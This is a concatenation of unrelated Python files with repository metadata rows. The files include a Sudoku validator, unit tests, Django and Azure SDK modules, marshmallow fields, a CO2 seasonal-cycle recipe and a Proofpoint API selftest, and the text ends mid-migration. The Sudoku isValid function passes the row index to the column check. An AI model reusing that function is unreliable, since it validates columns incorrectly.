# ,[".",".",".","4","1","9",".",".","5"]
# ,[".",".",".",".","8",".",".","7","9"]]
# Output: false
# Explanation: Same as Example 1, except with the 5 in the top left corner being modified to 8. Since there are two 8's in the top left 3x3 sub-box, it is invalid.
# Algorithm
# Check if the rows and columns contain values 1-9, without repetition.
# If any row or column violates this condition, the Sudoku board is invalid.
# Check to see if each of the 9 sub-squares contains values 1-9, without repetition. If they do, the Sudoku board is valid; otherwise, it is invalid.
# Checks whether there is any duplicate in current row or not
def NotInRow(arr, row):
st=set()
for i in range(0,9):
# If already encountered before,
# return false
if arr[row][i] in st:
return False
# If it is not an empty cell, insert value
# at the current cell in the set
if arr[row][i] != '.':
st.add(arr[row][i])
return True
# Checks whether there is any duplicate in current column or not
def NotInCol(arr, col):
st=set()
for i in range(0,9):
if arr[i][col] in st:
return False
if arr[i][col] !='.':
st.add(arr[i][col])
return True
# Checks whether there is any duplicate in current 3x3 box or not.
def NotInBox(arr, StartRow, StartCol):
st=set()
for row in range(0,3):
for col in range(0,3):
curr=arr[row + StartRow][col + StartCol]
if curr in st:
return False
if curr != '.':
st.add(curr)
return True
# Checks whether current row and current column and current 3x3 box is valid or not
def isValid(arr,row, col):
return (NotInRow(arr,row) and NotInCol(arr,row) and NotInBox(arr, row-row %3 , col - col %3 ))
def IsValidConfig(arr,n):
for i in range(0,n):
for j in range(0,n):
if not isValid(arr, i, j ):
return False
return True
if __name__ == "__main__":
#Valid
# board = [['5', '3', '.', '.', '7', '.', '.', '.', '.'],
# ['6', '.', '.', '1', '9', '5', '.', '.', '.'],
# ['.', '9', '8', '.', '.', '.', '.', '6', '.'],
# ['8', '.', '.', '.', '6', '.', '.', '.', '3'],
# ['4', '.', '.', '8', '.', '3', '.', '.', '1'],
# ['7', '.', '.', '.', '2', '.', '.', '.', '6'],
# ['.', '6', '.', '.', '.', '.', '2', '8', '.'],
# ['.', '.', '.', '4', '1', '9', '.', '.', '5'],
# ['.', '.', '.', '.', '8', '.', '.', '7', '9']]
#InValid
board = [['8', '3', '.', '.', '7', '.', '.', '.', '.'],
['6', '.', '.', '1', '9', '5', '.', '.', '.'],
['.', '9', '8', '.', '.', '.', '.', '6', '.'],
['8', '.', '.', '.', '6', '.', '.', '.', '3'],
['4', '.', '.', '8', '.', '3', '.', '.', '1'],
['7', '.', '.', '.', '2', '.', '.', '.', '6'],
['.', '6', '.', '.', '.', '.', '2', '8', '.'],
['.', '.', '.', '4', '1', '9', '.', '.', '5'],
['.', '.', '.', '.', '8', '.', '.', '7', '9']]
if IsValidConfig(board, 9 ):
print ("YES")
else:
print ("NO")
|
[
"samarendra.mohapatra121@gmail.com"
] |
samarendra.mohapatra121@gmail.com
|
fb2a76cd6a85c90f75d740c9a18b28efbc09de86
|
e94b018362431ce8b22fe306aa0db23e82362b82
|
/tests/common/test_util.py
|
ead5c31bf85ad9b6d671e2ac78f9c47528fa9607
|
[
"MIT"
] |
permissive
|
tybiot/SBMLLint
|
71745fb44f2a6e1be83e0d6854aa7b1caa700a4d
|
f11124c4059f40496454ba1adc814f1bd33c783b
|
refs/heads/master
| 2022-11-13T20:27:48.343268
| 2020-06-28T23:56:40
| 2020-06-28T23:56:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,188
|
py
|
from SBMLLint.common import constants as cn
from SBMLLint.common import exceptions
from SBMLLint.common import util
import libsbml
import numpy as np
import os
import unittest
NUM_S1 = 2
NUM_S2 = 3
IGNORE_TEST = False
ANTIMONY_STG = '''
%dS1 -> %dS2; 1
S1 = 0
S2 = 0
''' % (NUM_S1, NUM_S2)
ZIP_PATH = os.path.join(cn.BIOMODELS_DIR, cn.BIOMODELS_ZIP_FILENAME)
#############################
# Tests
#############################
class TestFunctions(unittest.TestCase):
def testGetXMLString(self):
def test(xml):
reader = libsbml.SBMLReader()
document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(document)
model = document.getModel()
self.assertTrue('Reaction' in str(type(model.getReaction(0))))
def getString(path):
with open(path, 'r') as fd:
lines = '\n'.join(fd.readlines())
return lines
#
for path in [cn.TEST_FILE2, cn.TEST_FILE3]:
try:
test(util.getXML(path))
test(util.getXML(getString(path)))
except exceptions.MissingTelluriumError:
pass
def testGetXMLFromAntimony(self):
try:
xml = util.getXMLFromAntimony(ANTIMONY_STG)
except exceptions.MissingTelluriumError:
return
self.assertTrue(isinstance(xml, str))
reader = libsbml.SBMLReader()
libsbml_document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(libsbml_document)
model = libsbml_document.getModel()
self.assertTrue('Reaction' in
str(type(model.getReaction(0))))
def testIsInt(self):
self.assertTrue(util.isInt(1))
self.assertFalse(util.isInt(1.5))
self.assertFalse(util.isInt('ab'))
def testIsFloat(self):
self.assertTrue(util.isFloat(1))
self.assertTrue(util.isFloat(1.5))
self.assertTrue(util.isFloat('1.5'))
self.assertFalse(util.isFloat('ab'))
def testIsSBMLModel(self):
return
self.assertFalse(util.isSBMLModel("dummy"))
xml = util.getXML(cn.TEST_FILE2)
reader = libsbml.SBMLReader()
document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(document)
model = document.getModel()
self.assertTrue(util.isSBMLModel(model))
def testUniqueify(self):
class Tester():
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
def isEqual(self, other):
return self.name == other.name
#
STRING = 'abc'
REPEATED_STRING = STRING + STRING
collection = [Tester(s) for s in REPEATED_STRING]
result = util.uniqueify(collection)
self.assertEqual(len(result), len(STRING))
def testGetNextFid(self):
fid = open(ZIP_PATH, "r")
count = 0
for zip_fid in util.getNextFid(fid, is_print=False):
lines = zip_fid.read()
count += 1
self.assertGreater(len(lines), 0)
self.assertGreater(count, 0)
def testRunFunction(self):
def testFunc(a, b=2):
if b == 0:
raise(ValueError)
return a/b
#
self.assertEqual(
util.runFunction(testFunc, [6], {'b': 3}), 2)
result = util.runFunction(testFunc, [6], {'b': 0})
self.assertIsNone(result)
if __name__ == '__main__':
unittest.main()
|
[
"jlheller@uw.edu"
] |
jlheller@uw.edu
|
58467f4df4f61b2e8564e17b1028b7aef8aea879
|
2b5b082ca006eb8063a4a43f4998f4c0268a46e6
|
/sessauth2/sessauth2/asgi.py
|
dcaac02c620f4158a3c708ba0533fcbea01eccc9
|
[] |
no_license
|
shobhit1215/Rest_Framework_tut
|
a52ae5b7a1f0213ace19d9b2b5d557b15d36c376
|
351da2564a55d1530f5517627cce73663252d07c
|
refs/heads/main
| 2023-05-26T04:47:01.336843
| 2021-06-03T12:43:51
| 2021-06-03T12:43:51
| 373,503,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for sessauth2 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sessauth2.settings')
application = get_asgi_application()
|
[
"imshobhit.sb@gmail.com"
] |
imshobhit.sb@gmail.com
|
b6334ff9ea75bda1417ea705234c6515841b743d
|
cdfcac165a7c06a137cb3563dbe31d3044494a95
|
/6_SGD/1_0_gradientTape.py
|
402b93080c204c3e0fdb1f37475164524621c459
|
[] |
no_license
|
fzingithub/learningTensorflowProject
|
141b3d980a7aa6f729cea18a72ae83d591812c83
|
5607be5f8daeb5591aba719e69b53b34b93d1e03
|
refs/heads/master
| 2020-05-19T19:05:17.495549
| 2019-09-25T06:48:04
| 2019-09-25T06:48:04
| 185,169,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
# -*- coding: utf-8 -*-
'''
Created on 2019/5/7
Author: zhe
Email: 1194585271@qq.com
'''
import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# w = tf.constant(1.)
# x = tf.constant(2.)
# y = x * w
# with tf.GradientTape() as tape:
# tape.watch([w])
# y2 = x * w
#
# grad1 = tape.gradient(y, [w])
# print(grad1)
#
# with tf.GradientTape() as tape:
# tape.watch([w])
# y2 = x * w
#
# grad2 = tape.gradient(y2, [w])
# print(grad2)
# persistent
w = tf.constant(1.)
x = tf.constant(2.)
y = x * w
with tf.GradientTape(persistent=True) as tape:
tape.watch([w])
y2 = x * w
grad = tape.gradient(y2, [w])
print(grad)
grad = tape.gradient(y2, [w])
print(grad)
|
[
"1194585271@qq.com"
] |
1194585271@qq.com
|
873c85d7134a8df275df8a80775826b5150e310d
|
ec80586b3aa3e90178a59446b33948012121b56f
|
/relationship_app/admin.py
|
022de5e18e33d4fb2cca13f2b8d97b6f3ba98602
|
[] |
no_license
|
amritghimire/se
|
567f050969e0e2ad667684f1d6ca03a2f21071bf
|
6c150cb75e61b43cc938216a4e5f661d5a97aa11
|
refs/heads/master
| 2021-03-19T17:24:20.234650
| 2019-09-03T05:55:04
| 2019-09-03T05:55:04
| 112,606,113
| 0
| 0
| null | 2019-09-03T05:56:46
| 2017-11-30T11:57:56
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 201
|
py
|
from django.contrib import admin
from .models import Relationship,RelationshipWithQuestion
# Register your models here.
admin.site.register(Relationship)
admin.site.register(RelationshipWithQuestion)
|
[
"iamritghimire@gmail.com"
] |
iamritghimire@gmail.com
|
2acba97797af6087bb411fa464e5be1ea2a890ed
|
c83e356d265a1d294733885c373d0a4c258c2d5e
|
/mayan/apps/documents/migrations/0071_auto_20201128_0330.py
|
6583b82c2de0181c330da3426f188f2204c35e62
|
[
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3
|
4160809d2c96707a196b8c94ea9e4df1a119d96a
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
refs/heads/master
| 2023-08-21T23:36:41.230179
| 2021-10-02T03:51:12
| 2021-10-02T03:51:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('documents', '0070_auto_20201128_0249'),
]
operations = [
migrations.RenameField(
model_name='document',
old_name='date_added',
new_name='datetime_created',
),
]
|
[
"79801878+Meng87@users.noreply.github.com"
] |
79801878+Meng87@users.noreply.github.com
|
a436ead0e31e3f5f505f43aab6f77de6ca2edc9e
|
e71fa62123b2b8f7c1a22acb1babeb6631a4549b
|
/xlsxwriter/test/comparison/test_escapes02.py
|
1a1af325a8fe56d1c47442561a85b514ba40e94d
|
[
"BSD-2-Clause"
] |
permissive
|
timgates42/XlsxWriter
|
40480b6b834f28c4a7b6fc490657e558b0a466e5
|
7ad2541c5f12b70be471b447ab709c451618ab59
|
refs/heads/main
| 2023-03-16T14:31:08.915121
| 2022-07-13T23:43:45
| 2022-07-13T23:43:45
| 242,121,381
| 0
| 0
|
NOASSERTION
| 2020-02-21T11:14:55
| 2020-02-21T11:14:55
| null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('escapes02.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with comments.Check encoding of comments."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.write('A1', '"<>\'&')
worksheet.write_comment('B2', """<>&"'""")
worksheet.set_comments_author("""I am '"<>&""")
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
a6ffc620d1d3aee1f0cdf209cf463c92bf609284
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-network/azure/mgmt/network/v2018_07_01/models/express_route_circuits_routes_table_list_result.py
|
692bb9903130c0dd3e820e34bf91cfa419fcb98f
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,282
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExpressRouteCircuitsRoutesTableListResult(Model):
"""Response for ListRoutesTable associated with the Express Route Circuits
API.
:param value: The list of routes table.
:type value:
list[~azure.mgmt.network.v2018_07_01.models.ExpressRouteCircuitRoutesTable]
:param next_link: The URL to get the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ExpressRouteCircuitRoutesTable]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ExpressRouteCircuitsRoutesTableListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
9e51529629c36bcf385786cb805d47763c6f5ab2
|
0c325cf7a68ef51067ed8db566d525a20de5b635
|
/other/panda365/panda365/pd/api/fields.py
|
42906c17d0e2cd22fb5c65f2f94fbe5c1743ff4f
|
[] |
no_license
|
alinzel/NOTES
|
2ab6aa1ef1d601a9ae8c0d23c0df2bca7e1aa241
|
3e0594641a605580e920d0b08a251fbc99f34e2f
|
refs/heads/master
| 2023-01-08T22:48:30.762625
| 2020-01-17T09:14:47
| 2020-01-17T09:14:47
| 175,339,492
| 0
| 0
| null | 2022-12-27T15:01:19
| 2019-03-13T03:28:08
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,120
|
py
|
from base64 import b64decode
from io import BytesIO
from marshmallow import fields, validate, ValidationError
from sqlalchemy import inspect
from werkzeug.datastructures import FileStorage
import binascii
import uuid
class DataURL(fields.String):
"""
data url as defined in RFC 2397:
data:[mimetype][;base64],[data]
Usually used only for parsing incoming data.
"""
default_error_messages = {
'malformed': 'cannot be parsed as a data url.',
'padding': 'payload is incorrectly padded',
'mimetype': 'mimetype not allowed',
}
def __init__(self, *args, allowed_mimetypes=None, **kwargs):
if kwargs.get('load_only') is False:
raise ValueError('this field can only be used to load data; '
'however load_only is set to False')
kwargs['load_only'] = True
kwargs.setdefault('description',
'RFC 2397 data url. '
'Format: `data:[mimetype][;base64],[data]`')
super().__init__(*args, **kwargs)
if allowed_mimetypes:
self._allowed_mimetypes = set(allowed_mimetypes)
else:
self._allowed_mimetypes = None
def validate_mimetype(self, mimetype):
if self._allowed_mimetypes and mimetype not in self._allowed_mimetypes:
self.fail('mimetype')
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
if not value.startswith('data:'):
self.fail('malformed')
try:
comma_index = value.index(',')
except ValueError:
self.fail('malformed')
# 5 is for "data:"
mimetype, _ = value[5:comma_index].split(';')
if not mimetype:
self.fail('malformed')
self.validate_mimetype(mimetype)
# construct stream from data
try:
# +1 to skip the comma
data = b64decode(value[comma_index + 1:])
except binascii.Error:
self.fail('padding')
name = '{}.{}'.format(uuid.uuid4().hex, mimetype.split('/')[-1])
return FileStorage(
stream=BytesIO(data),
content_type=mimetype,
filename=name,
name=name,
)
class Currency(fields.String):
def _deserialize(self, value, attr, obj):
raise NotImplementedError() # pragma: no cover
def _serialize(self, value, attr, obj):
if value: # pragma: no cover
return {
'code': value.code,
'symbol': value.symbol
}
class Enum(fields.String):
def __init__(self, enum, choices=None, *args, **kwargs):
"""
:param enum: enum used to validate incoming value
:param list choices:
by default all items of the enum are used. If only a subset of the
enum should be used, pass them in here.
Example::
class Status(Enum):
ok = 1
fail = 2
my_dirty_internal_enum_which_should_not_be_told = 3
class FooSchema(Schema):
status = Enum(
enum=Status, choices=[Status.ok, Status.fail])
"""
self._enum = enum
validators = kwargs.setdefault('validate', [])
validators.append(validate.OneOf(choices=choices or enum))
self.default_error_messages.update(
dict(bad_enum='{value} is not a valid choice'))
super().__init__(*args, **kwargs)
def _serialize(self, value, attr, obj):
if value:
return getattr(value, 'name')
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
try:
return getattr(self._enum, value)
except AttributeError:
self.fail('bad_enum', value=repr(value))
class ProductInfo(fields.String):
def __init__(self, **kwargs):
kwargs.setdefault(
'description', '''
a list of objects, each has the key `name` and
`value`. Example:
[
{
"name": "Brand",
"value": "Apple"
}, {
"name": "Country",
"value": "China"
}
]
'''
)
super().__init__(**kwargs)
def _serialize(self, value, attr, obj):
if not value:
return
ret = []
for line in value.split('\n'):
k, v = line.split(':')
ret.append(dict(name=k, value=v))
return ret
def _deserialize(self, value, attr, obj):
raise NotImplementedError() # pragma: no cover
class ModelPKField(fields.Integer):
"""A field representing a model instance.
This serializes the value to the id of the model, and deserialize from
a given id to a model instance
:param model_class: a db Model
:param filters: filters to apply when getting the record from id
"""
default_error_messages = {
'notfound': 'record cannot be found',
}
def __init__(self, model_class, *filters, **kwargs):
pks = inspect(model_class).primary_key
if len(pks) > 1: # pragma: no cover
raise ValueError('only support models with 1 primary key')
self.model = model_class
self.filters = filters
self.pk_name = pks[0].name
super().__init__(**kwargs)
# def _serialize(self, value, attr, obj):
# if isinstance(value, self.model):
# return getattr(value, self.pk_name)
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
filters = []
for f in self.filters:
if callable(f):
f = f()
filters.append(f)
obj = self.model.query.filter(
getattr(self.model, self.pk_name) == value,
*filters
).first()
if not obj:
raise ValidationError('{} {} cannot be found'.format(
self.model.__name__, value,
))
return obj
|
[
"944951481@qq.com"
] |
944951481@qq.com
|
3f197feb9ea3a2c2da2ddc7cde1f71136c78662a
|
35baf7fe5bb66f2402de400383b8aa426c097bfb
|
/co2_diag/recipes/seasonal_cycles.py
|
95de0cc00e4835814255f8121b1a1b9cd8473448
|
[
"BSD-3-Clause"
] |
permissive
|
BunnyVon/gdess
|
24f0e7e1e6d2a00dbbcd9e3fa72e65d983b6567a
|
09b83b3d7ade133b6d993e010912bee86c24c934
|
refs/heads/main
| 2023-07-18T06:11:09.937268
| 2021-09-05T19:09:10
| 2021-09-05T19:09:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,919
|
py
|
""" This produces plots of seasonal cycles of atmospheric CO2
This function parses:
- observational data from Globalview+ surface stations
- model output from CMIP6
================================================================================
"""
from co2_diag import set_verbose, benchmark_recipe
from co2_diag.recipe_parsers import parse_recipe_options, add_seasonal_cycle_args_to_parser
from co2_diag.recipes.recipe_utils import populate_station_list
from co2_diag.graphics.comparison_plots import plot_comparison_against_model, plot_lines_for_all_station_cycles
from co2_diag.operations.Confrontation import Confrontation, load_cmip_model_output
from co2_diag.formatters import numstr, append_before_extension
from dask.diagnostics import ProgressBar
from typing import Union
import argparse, logging
_logger = logging.getLogger(__name__)
@benchmark_recipe
def seasonal_cycles(options: Union[dict, argparse.Namespace],
verbose: Union[bool, str] = False,
) -> tuple:
"""Execute a series of preprocessing steps and generate a diagnostic result.
Relevant co2_diag collections are instantiated and processed.
If one station is specified, then that will be compared against model data at the same location
If more than one station is specified, then no model data will be compared against it.
Parameters
----------
options : Union[dict, argparse.Namespace]
Recipe options specified as key:value pairs. It can contain the following keys:
ref_data : str
(required) directory containing the NOAA Obspack NetCDF files
model_name : str, default 'CMIP.NOAA-GFDL.GFDL-ESM4.esm-hist.Amon.gr1'
cmip_load_method : str, default 'pangeo'
either 'pangeo' (which uses a stored url),
or 'local' (which uses the path defined in config file)
start_yr : str, default '1960'
end_yr : str, default '2015'
latitude_bin_size : numeric, default None
figure_savepath : str, default None
difference : str, default None
globalmean : str
either 'station', which requires specifying the <station_code> parameter,
or 'global', which will calculate a global mean
station_list : str, default 'mlo'
a sequence of three letter codes (space-delimited) to specify
the desired surface observing station
verbose : Union[bool, str]
can be either True, False, or a string for level such as "INFO, DEBUG, etc."
Returns
-------
A tuple:
A DataFrame containing the data that were plotted.
A list of the data for each station
A DataFrame containing the metadata for each station
(and if a comparison with a model was made, then the datetimes and values are also part of the returned tuple)
"""
set_verbose(_logger, verbose)
if verbose:
ProgressBar().register()
_logger.debug("Parsing diagnostic parameters...")
opts = parse_recipe_options(options, add_seasonal_cycle_args_to_parser)
stations_to_analyze = populate_station_list(opts.run_all_stations, opts.station_list)
# --- Load CMIP model output ---
compare_against_model, ds_mdl = load_cmip_model_output(opts.model_name, opts.cmip_load_method, verbose=verbose)
conf = Confrontation(compare_against_model, ds_mdl, opts, stations_to_analyze, verbose)
cycles_of_each_station, concatenated_dfs, df_station_metadata, \
xdata_obs, xdata_mdl, ydata_obs, ydata_mdl, \
rmse_y_true, rmse_y_pred = conf.looper(how='seasonal')
# --- Plot the seasonal cycles at all station locations
plot_lines_for_all_station_cycles(xdata_obs, ydata_obs.iloc[:, ::-1], figure_title="GV+",
savepath=append_before_extension(opts.figure_savepath, 'obs_lineplot'))
if ydata_mdl is not None:
# (ii) CMIP data
plot_lines_for_all_station_cycles(xdata_obs, ydata_mdl.iloc[:, ::-1], figure_title="CMIP",
savepath=append_before_extension(opts.figure_savepath, 'mdl_lineplot'))
# (iii) Model - obs difference
ydiff = ydata_mdl - ydata_obs
plot_lines_for_all_station_cycles(xdata_obs, ydiff.iloc[:, ::-1], figure_title="Difference",
savepath=append_before_extension(opts.figure_savepath, 'diff_lineplot'))
# (iv) Model and obs difference
plot_comparison_against_model(xdata_obs, ydata_obs, f'obs',
xdata_obs, ydata_mdl, f'model',
savepath=append_before_extension(opts.figure_savepath, 'overlapped'))
_logger.info("Saved at <%s>" % opts.figure_savepath)
return concatenated_dfs, cycles_of_each_station, df_station_metadata
|
[
"dkauf42@gmail.com"
] |
dkauf42@gmail.com
|
f78f19d145b126047de673d89f70e08fdc0684a7
|
3cf0d750948a758d5771dd778fbb783d64a044ae
|
/src/pads/tests/test_lca.py
|
b11cbc743ce87210e3a1d60e058e855380055c1b
|
[
"CC-BY-NC-SA-4.0",
"Apache-2.0",
"MIT"
] |
permissive
|
hbulpf/pydemo
|
6552a08b3c85721ac1b2ba335b030e234ad03b6c
|
ea3e9f9086116a86ecef803e9e3179a34c94c20f
|
refs/heads/master
| 2022-11-30T21:06:29.933820
| 2022-01-15T17:05:16
| 2022-01-15T17:05:16
| 237,584,300
| 6
| 1
|
Apache-2.0
| 2022-11-22T09:49:38
| 2020-02-01T08:20:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,413
|
py
|
import random
import unittest
from pads.lca import RangeMin
from pads.lca import LogarithmicRangeMin
from pads.lca import LCA
from pads.lca import OfflineLCA
class RandomRangeMinTest(unittest.TestCase):
def testRangeMin(self):
for trial in range(20):
data = [random.choice(range(1000000))
for i in range(random.randint(1,100))]
R = RangeMin(data)
for sample in range(100):
i = random.randint(0,len(data)-1)
j = random.randint(i+1,len(data))
self.assertEqual(R[i:j],min(data[i:j]))
class LCATest(unittest.TestCase):
parent = {'b':'a','c':'a','d':'a','e':'b','f':'b','g':'f','h':'g','i':'g'}
lcas = {
('a','b'):'a',
('b','c'):'a',
('c','d'):'a',
('d','e'):'a',
('e','f'):'b',
('e','g'):'b',
('e','h'):'b',
('c','i'):'a',
('a','i'):'a',
('f','i'):'f',
}
def testLCA(self):
L = LCA(self.parent)
for k,v in self.lcas.items():
self.assertEqual(L(*k),v)
def testLogLCA(self):
L = LCA(self.parent, LogarithmicRangeMin)
for k,v in self.lcas.items():
self.assertEqual(L(*k),v)
def testOfflineLCA(self):
L = OfflineLCA(self.parent, self.lcas.keys())
for (p,q),v in self.lcas.items():
self.assertEqual(L[p][q],v)
|
[
"hudalpf@163.com"
] |
hudalpf@163.com
|
c9b58a0e23df735180efc08cacda6fe5dd2b365f
|
612e9449ddbe95f1b4a0dd21e13e46661e39c872
|
/lib/formats/json.py
|
3c6e746b04f54281505f5b27327aa67f161ddd3f
|
[] |
no_license
|
racposner/label_reconciliations
|
0ad22c8250a5d6662e9aeebeb97741146ac8fdac
|
4c916994e7f193e6ed0b1c6b18f247239f1d847a
|
refs/heads/master
| 2022-11-27T02:00:51.108238
| 2020-07-28T18:47:53
| 2020-07-28T18:47:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
"""Import a flat JSON file as unreconciled data."""
import pandas as pd
import lib.util as util
def read(args):
"""Read a JSON file into a data-frame."""
unreconciled = pd.read_json(args.input_file)
unreconciled = util.unreconciled_setup(args, unreconciled)
return unreconciled, {}
|
[
"raphael.lafrance@gmail.com"
] |
raphael.lafrance@gmail.com
|
8c0e06b23fc473400d9b904b94698f979e0ff6ef
|
9b34e542589b7d0d327d3255ac4fcd0bcf5e7216
|
/first one from right to left in binary.py
|
e09a044e3aaf81efa19205fa549a8331750abc86
|
[] |
no_license
|
Sravaniram/pythonprogramming
|
9ee23cd2ff925fa2c6af320d59643747db173cd7
|
4c09c6787a39b18a12dfcbb2c33fcceabd4fc621
|
refs/heads/master
| 2020-03-26T23:26:03.391360
| 2019-04-23T12:49:53
| 2019-04-23T12:49:53
| 145,541,824
| 1
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
n,m=map(int,input().split())
k=bin(n*m)
c=0
for x in range(len(k)-1,1,-1):
c=c+1
if(k[x]=='1'):
print(c)
break
|
[
"noreply@github.com"
] |
Sravaniram.noreply@github.com
|
d4b58b2e033e8c716f005be46976aa0c5a9599e7
|
347c70d4851b568e03e83387f77ae81071ab739e
|
/fn_proofpoint_tap/fn_proofpoint_tap/util/selftest.py
|
f923ce1c4bd5ea486dbcb877544c0adc313565cb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
neetinkandhare/resilient-community-apps
|
59d276b5fb7a92872143ce2b94edd680738693ce
|
3ecdabe6bf2fc08f0f8e58cbe92553270d8da42f
|
refs/heads/master
| 2021-12-27T09:05:36.563404
| 2021-09-29T13:04:56
| 2021-09-29T13:04:56
| 159,804,866
| 1
| 0
|
MIT
| 2021-08-03T19:45:45
| 2018-11-30T10:07:32
|
Python
|
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
"""Function implementation
test with: resilient-circuits selftest -l fn_proofpoint_campaign
"""
import logging
import os
from requests.auth import HTTPBasicAuth
from resilient_lib import RequestsCommon, validate_fields
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler())
def selftest_function(opts):
"""
Placeholder for selftest function. An example use would be to test package api connectivity.
Suggested return values are be unimplemented, success, or failure.
"""
options = opts.get('fn_proofpoint_tap', {})
validate_fields(['base_url', 'username', 'password'], options)
base_url = options.get('base_url')
username = options.get('username')
password = options.get('password')
cafile = options.get('cafile')
bundle = os.path.expanduser(cafile) if cafile else False
basic_auth = HTTPBasicAuth(username, password)
url = '{}/siem/all?format=JSON&sinceSeconds={}'.format(base_url, 300) # /v2/siem/all Fetch events for all clicks and messages relating to known threats within the specified time period
rc = RequestsCommon(opts=opts, function_opts=options)
try:
res = rc.execute_call_v2('get', url, auth=basic_auth, verify=bundle, proxies=rc.get_proxies())
if res.status_code == 200:
return {'state': 'success'}
return {
'state': 'failure',
'reason': 'status code {0}'.format(res.status_code)
}
except Exception as ex:
log.error(ex)
return {
'state': 'failure',
'reason': ex
}
|
[
"ihor.husar@ibm.com"
] |
ihor.husar@ibm.com
|
85e1dfdd04e38ad955261cc8e671a25fb7798885
|
26dec2f8f87a187119336b09d90182d532e9add8
|
/mcod/histories/apps.py
|
a7f0a00b9687b8ac862b1830d5b72c8fe03043fe
|
[] |
no_license
|
olekstomek/mcod-backend-dane.gov.pl
|
7008bcd2dbd0dbada7fe535536b02cf27f3fe4fd
|
090dbf82c57633de9d53530f0c93dddf6b43a23b
|
refs/heads/source-with-hitory-from-gitlab
| 2022-09-14T08:09:45.213971
| 2019-05-31T06:22:11
| 2019-05-31T06:22:11
| 242,246,709
| 0
| 1
| null | 2020-02-24T22:39:26
| 2020-02-21T23:11:50
|
Python
|
UTF-8
|
Python
| false
| false
| 187
|
py
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class HistoriesConfig(AppConfig):
name = 'mcod.histories'
verbose_name = _('Histories')
|
[
"piotr.zientarski@britenet.com.pl"
] |
piotr.zientarski@britenet.com.pl
|
0bba8246a143872757d6de146020f6d5366ab9fb
|
6dcf2d8ce367d6afd64024e5f41d4a11c27ca3d5
|
/gmecol/migrations/0002_auto__add_field_game_image_url__add_field_game_remote_id__add_field_pl.py
|
293eada3da4be3326dd035ea611a874e7f9c658c
|
[
"BSD-2-Clause"
] |
permissive
|
iyox/gmecol
|
75cc02870958fb0c747f93f62c42868eaf11601b
|
c03ff0fdfca7cb73fe8646e1ed4543db7d2e6c89
|
refs/heads/master
| 2021-01-15T16:58:27.692794
| 2012-09-06T03:50:39
| 2012-09-06T03:50:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,919
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Game.image_url'
